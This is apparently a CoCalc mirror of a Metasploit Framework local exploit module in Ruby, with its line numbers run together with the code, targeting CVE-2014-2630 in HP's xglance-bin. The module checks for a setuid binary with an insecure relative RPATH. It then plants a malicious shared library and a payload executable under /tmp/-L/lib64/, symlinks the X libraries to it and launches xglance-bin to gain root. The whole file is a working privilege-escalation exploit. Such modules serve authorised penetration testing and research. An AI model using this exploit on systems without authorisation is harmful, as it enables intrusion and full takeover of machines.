CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/local/hp_xglance_priv_esc.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = GreatRanking78include Msf::Post::Linux::Priv9include Msf::Post::Linux::System10include Msf::Post::Linux::Compile11include Msf::Post::File12include Msf::Exploit::EXE13include Msf::Exploit::FileDropper14prepend Msf::Exploit::Remote::AutoCheck1516def initialize(info = {})17super(18update_info(19info,20'Name' => 'HP Performance Monitoring xglance Priv Esc',21'Description' => %q{22This exploit takes advantage of xglance-bin, part of23HP's Glance (or Performance Monitoring) version 11 'and subsequent'24, which was compiled with an insecure RPATH option. The RPATH includes25a relative path to -L/lib64/ which can be controlled by a user.26Creating libraries in this location will result in an27escalation of privileges to root.28},29'License' => MSF_LICENSE,30'Author' => [31'h00die', # msf module32'Tim Brown', # original finding33'Robert Jaroszuk', # exploit34'Marco Ortisi', # exploit35],36'Platform' => [ 'linux' ],37'Arch' => [ ARCH_X86, ARCH_X64 ],38'SessionTypes' => [ 'shell', 'meterpreter' ],39'Targets' => [40[ 'Automatic', {} ],41[ 'Linux x86', { 'Arch' => ARCH_X86 } ],42[ 'Linux x64', { 'Arch' => ARCH_X64 } ]43],44'Privileged' => true,45'References' => [46[ 'EDB', '48000' ],47[ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding48[ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit49[ 'URL', 'https://github.com/redtimmy/perf-exploiter' ],50[ 'PACKETSTORM', '156206' ],51[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ],52[ 'CVE', '2014-2630' ]53],54'DisclosureDate' => '2014-11-19',55'DefaultTarget' => 0,56'Notes' => {57'Stability' => [CRASH_SAFE],58'Reliability' => [REPEATABLE_SESSION],59'SideEffects' => [ARTIFACTS_ON_DISK]60}61)62)63register_options [64OptString.new('GLANCE_PATH', [ true, 'Path to xglance-bin', '/opt/perf/bin/xglance-bin' ])65]66register_advanced_options [67OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])68]69end7071# Simplify pulling the writable directory variable72def base_dir73datastore['WritableDir'].to_s74end7576def exploit_folder77"#{base_dir}/-L/lib64/"78end7980def glance_path81datastore['GLANCE_PATH'].to_s82end8384# Pull the exploit binary or file (.c typically) from our system85def exploit_data(file)86::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file)87end8889def find_libs90libs = cmd_exec "ldd #{glance_path} | grep libX"91%r{(?<lib>libX.+\.so\.\d) => -L/lib64} =~ libs92return nil if lib.nil?9394lib95end9697def check98return CheckCode::Safe("#{glance_path} file not found") unless file? glance_path99return CheckCode::Safe("#{glance_path} is not setuid") unless setuid? glance_path100101lib = find_libs102if lib.nil?103vprint_error 'Patched xglance-bin, not linked to -L/lib64/'104return CheckCode::Safe105end106vprint_good "xglance-bin found, and linked to vulnerable relative path -L/lib64/ through #{lib}"107CheckCode::Appears108end109110def exploit111if !datastore['ForceExploit'] && is_root?112fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')113end114115unless writable? base_dir116fail_with Failure::BadConfig, "#{base_dir} is not writable"117end118119# delete exploit folder in case a previous attempt failed120vprint_status("Deleting exploit folder: #{base_dir}/-L")121rm_cmd = "rm -rf \"#{base_dir}/-L\""122cmd_exec(rm_cmd)123# make folder124vprint_status("Creating exploit folder: #{exploit_folder}")125cmd_exec "mkdir -p #{exploit_folder}"126register_dir_for_cleanup "#{base_dir}/-L"127128# drop our .so on the system that calls our payload129# we need gcc to compile instead of metasm since metasm130# removes unused variables, which we need to keep xglance-bin131# from breaking and not launching our exploit132so_file = "#{exploit_folder}libXm.so.3"133if live_compile?134vprint_status 'Live compiling exploit on system...'135payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"136code = exploit_data('CVE-2014-2630.c')137code.sub!(payload_path.to_s, payload_path) # inject our payload path138upload_and_compile so_file, code, '-fPIC -shared -static-libgcc'139rm_f "#{so_file}.c"140else141payload_path = '/tmp/.u4aLoiq'142vprint_status 'Dropping pre-compiled exploit on system...'143upload_and_chmodx so_file, exploit_data('libXm.so.3')144end145146# Upload payload executable147vprint_status 'uploading payload'148upload_and_chmodx payload_path, generate_payload_exe149150# link so files to exploit vuln151lib = find_libs152# just to be safe, Xt and Xp were in the original exploit153# our mock binary is also exploitsable through libXmu.so.6154# unsure about the real binary155cd exploit_folder156['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l|157cmd_exec "ln -s libXm.so.3 #{l}"158end159160# Launch exploit161print_status 'Launching xglance-bin...'162cd base_dir163output = cmd_exec glance_path164output.each_line { |line| vprint_status line.chomp }165print_warning("Manual cleanup of #{exploit_folder} may be required")166end167end168169170